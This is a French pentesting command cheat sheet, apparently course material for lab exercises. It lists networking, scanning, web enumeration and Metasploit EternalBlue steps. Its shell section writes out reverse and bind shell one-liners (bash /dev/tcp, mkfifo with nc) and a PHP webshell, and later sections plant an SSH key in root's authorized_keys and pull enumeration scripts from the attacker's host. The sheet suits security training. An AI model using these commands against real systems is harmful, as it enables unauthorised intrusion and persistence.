Général

Connexion et Réseau

CommandeDescription
sudo openvpn user.ovpnSe connecter au VPN
ifconfig/ip aAfficher notre adresse IP
netstat -rnAfficher les réseaux accessibles via le VPN
ssh user@10.10.10.10SSH vers un serveur distant
ftp 10.129.42.253FTP vers un serveur distant
scp file user@10.129.42.253:/path/to/destinationCopier un fichier vers un serveur distant
ping 10.10.10.10Tester la connectivité vers une IP
traceroute 10.10.10.10Afficher le chemin des paquets vers une IP

Gestion de Fichiers

CommandeDescription
ls -laLister les fichiers dans le répertoire courant
cat fileAfficher le contenu d’un fichier
find /path -name "filename"Rechercher un fichier par nom
tar -cvf archive.tar /path/to/directoryCréer une archive tar
tar -xvf archive.tarExtraire une archive tar
nano fileÉditer un fichier avec l’éditeur nano
echo "text" > fileÉcrire du texte dans un fichier
echo "text" >> fileAjouter du texte à la fin d’un fichier
chmod +x script.shRendre un script exécutable
grep "pattern" fileRechercher un motif dans un fichier

SystĂšme et Utilitaires

CommandeDescription
whoamiAfficher l’utilisateur courant
uname -aAfficher les informations systĂšme
historyAfficher l’historique des commandes
clearEffacer l’écran du terminal
man commandAfficher le manuel d’une commande
./script.shExécuter un script dans le répertoire courant

Pentesting

Scan de Services

CommandeDescription
nmap 10.129.42.253Exécuter nmap sur une IP
nmap -sV -sC -p- 10.129.42.253Exécuter un scan nmap avec script et version sur une IP
locate scripts/citrixLister les différents scripts nmap disponibles
nmap --script smb-os-discovery.nse -p445 10.10.10.40Exécuter un script nmap sur une IP
netcat 10.10.10.10 22RĂ©cupĂ©rer la banniĂšre d’un port ouvert
smbclient -N -L \\\\10.129.42.253Lister les partages SMB
smbclient \\\\10.129.42.253\\usersSe connecter Ă  un partage SMB
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0Scanner SNMP sur une IP
onesixtyone -c dict.txt 10.129.42.254Bruteforce de la chaĂźne secrĂšte SNMP

ÉnumĂ©ration Web

CommandeDescription
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txtExécuter un scan de répertoire sur un site web
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txtExécuter un scan de sous-domaine sur un site web
curl -IL https://www.inlanefreight.comRécupérer la banniÚre du site web
whatweb 10.10.10.121Lister les détails sur le serveur web/certificats
curl 10.10.10.121/robots.txtLister les répertoires potentiels dans robots.txt
ctrl+U or F12 or ⌘+⌄+IVoir le code source de la page

Exploits Publics

CommandeDescription
searchsploit openssh 7.2Rechercher des exploits publics pour une application web
msfconsoleDémarrer le Framework Metasploit
search exploit eternalblueRechercher des exploits publics dans MSF
use exploit/windows/smb/ms17_010_psexecCommencer Ă  utiliser un module MSF
show optionsAfficher les options requises pour un module MSF
set RHOSTS 10.10.10.40Définir une valeur pour une option de module MSF
checkTester si le serveur cible est vulnérable
exploitExĂ©cuter l’exploit sur le serveur cible s’il est vulnĂ©rable

Utilisation des Shells

CommandeDescription
nc -lvnp 1234Démarrer un écouteur nc sur un port local
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'Envoyer un reverse shell depuis le serveur distant
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/fUne autre commande pour envoyer un reverse shell depuis le serveur distant
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/fDémarrer un bind shell sur le serveur distant
nc 10.10.10.1 1234Se connecter à un bind shell démarré sur le serveur distant
python -c 'import pty; pty.spawn("/bin/bash")'Améliorer le TTY du shell (1)
ctrl+z puis stty raw -echo puis fg puis entrée deux foisAméliorer le TTY du shell (2)
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.phpCréer un fichier webshell php
curl http://@SERVER_IP:PORT/shell.php?cmd=idExécuter une commande sur un webshell uploadé

Escalade de PrivilĂšges

CommandeDescription
./linpeas.shExécuter le script linpeas pour énumérer le serveur distant
sudo -lLister les privilĂšges sudo disponibles
sudo -u user /bin/echo Hello World!Exécuter une commande avec sudo
sudo su -Basculer vers l’utilisateur root (si nous avons accùs à sudo su)
sudo su user -Basculer vers un utilisateur (si nous avons accĂšs Ă  sudo su)
ssh-keygen -f keyCréer une nouvelle clé SSH
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keysAjouter la clĂ© publique gĂ©nĂ©rĂ©e Ă  l’utilisateur
ssh root@10.10.10.10 -i keySSH vers le serveur avec la clé privée générée

Transfert de Fichiers

CommandeDescription
python3 -m http.server 8000Démarrer un serveur web local
wget http://10.10.14.1:8000/linpeas.shTélécharger un fichier sur le serveur distant depuis notre machine locale
curl http://10.10.14.1:8000/linenum.sh -o linenum.shTélécharger un fichier sur le serveur distant depuis notre machine locale
scp linenum.sh user@remotehost:/tmp/linenum.shTransférer un fichier vers le serveur distant avec scp (nécessite un accÚs SSH)
base64 shell -w 0Convertir un fichier en base64
echo f0VMR...SNIO...InmDwU | base64 -d > shellConvertir un fichier depuis base64 vers sa forme originale
md5sum shellVĂ©rifier le md5sum du fichier pour s’assurer qu’il s’est converti correctement